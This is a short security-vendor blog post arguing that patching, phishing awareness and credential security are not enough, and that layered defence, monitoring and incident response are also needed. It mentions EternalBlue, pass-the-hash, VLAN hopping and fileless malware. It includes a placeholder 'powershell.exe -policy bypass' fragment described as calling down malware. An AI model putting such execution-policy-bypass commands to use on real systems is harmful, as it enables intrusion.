SCIS Security
Jul 21, 2017 · 4 min read

While we agree the 3 basics are a necessary part of any successful security operation or program. We have some counter thoughts. These aren’t designed to be the silver bullet that changes your idea that cyber sec is “b.s.” in your opinion — but I hope it clarifies why there is so much more than meets the eye that any one IT professional sees. To answer your question — yes our products and services “work” without doing the 3 basics because what us, and many others offer are hunting, analysis, and incident response. Really, any good security professional will tell you that defense has to be built in layers. Prevention appears to be the primary issue of your mitigation. But no matter how good you think you are, patched up, no one phishing, removing and hardening hosts — you aren’t going to stop 0-day vulnerabilities with black market exploits and even with appropriate hardening and monitoring of authentication — how do you stop that insider threat that performs cyber security attacks under the radar with legitimate access? What happens when a legitimate user not clicking a phish and a fully patched machine and software gets hit from an automatic 0-day exploit kit coming from a legitimate website’s CDN and then payload executes on their machine that results in a compromise followed by encrypted data exfil? The user patched and AV updated — didn’t from an ops perspective doing anything wrong and the credential store wasn’t used — the exploit uses the system privileges based on foobar exploit. That’s just one use case (part of the standard attacker kill chain and common as well) where the 3 basics simply aren’t enough.

Patching — Sure, lots of low hanging fruit there. Lower skilled pen testers used to eat up MS08–67 all day long with pre Win7 and even now, with the Wikileaks of EternalBlue. However, the EternalBlue vuln was a 0-day and wasn’t disclosed by anyone until the leaks. Microsoft had to scramble to create the patch and then customers needed to QA and scramble patching across a large set of enterprises and hopes that no one got to them first before the patch even hit. The point is, 0-day vulnerabilities and exploits either client (application interaction required) or service side (remote exploits usually) cannot all be fixed with patches. Some vendors simply refuse to create patches or other critical infrastructure, including hospitals, have to rely on legacy equipment to function — and guess what, the vendor probably isn’t going to create a patch. Basic infrastructure such as an IPS helps with that, but yes, many IPS vendors are overly priced. There are free and cheap alternatives that IT administrators can use to mitigate.

Social Engineering — Security awareness is a big deal; yes being skeptical and verifying the other side before taking action. While we have no argument against that this is a necessary campaign every organization needs. You’ll often find that many organizations lack the resources to get a 100% when sending out phishing and fraud call simulations.

Authentication Security — Guarding credentials, closing ports, removing unnecessary services, system hardening, etc. (This is really is more than one issue from a technical perspective). Let’s say you use secure password vaults, don’t get owned in a compromise, and you use strong encryption at rest and on-the-wire. What happens when a legitimate user does something intentionally wrong? Insider threat is still part of a serious cyber security program. Secure password/token negotiation, auth, and escrows can only get so far. Take Windows for example, the reason pen testers use pass-the-hash is because from an architecture standpoint stopping pass-the-hash isn’t directly possible because that’s how windows performs many of the transparent and integrations. Check out the problems of pass-the-hash and NTLM (v1 or v2 protocol, doesn’t matter). The alternative is if credentials were single purpose only and no one host shared credentials, ever on the network; imagine how many service accounts and IT admin rescue accounts would be affected. Also note that the use of multi-factor authentication helps but, that’s considered part of cyber security.

The point we’re trying to get across is that while your 3 basics are a good start. It’s not enough. There’s so many other aspects of cyber security that require attention that goes beyond the fundamentals ; for example — shell script based fileless malware for instance e.g. PowerShell; patching doesn’t really help with that, guarding credentials doesn’t stop a local system privileged execution, and social engineering campaigns doesn’t stop it either. How it gets put there and executed could be any number of ways that either bypasses your 3 basics. For instance, an external attacker (not an insider threat) managed to do bypass on the network via a VLAN hop and then was able to setup a man-in-the-middle attack where network traffic is essentially manipulated to do something else e.g. instead of a request to execute foo.exe it was to execute fileless malware powershell.exe -policy bypass (insert combination of encoded/unencoded cmdlets here to call down malware or perform devious tasks built in). Again no patch, no credential guarding, and no anti-phishing mentality could’ve stopped it. Now, you could argue that system hardening and proper configuration could’ve stopped it potentially — but again, that goes back to good cyber security; defense in layers. Not just the 3 basics.

Also to note that cyber security also includes as mentioned previously; monitoring and response — not to mention research. How can a vendor patch against something unless there’s a cyber security researchers finding vulnerabilities and reporting it responsibly? How can you tell when an IT person made a mistake or did something malicious? I would think cyber security analysts with forensic skills can help with that. But you would also need cyber security monitoring through logs, packets, decryption, etc. to be able to determine that. Far more than the proposed 3 basics.

)
    SCIS Security

    Written by

    SCIS Security Specializes in: Cyber Security, Surveillance Monitoring, and Integration Services. Veteran Owned and Operated. BBB Accredited.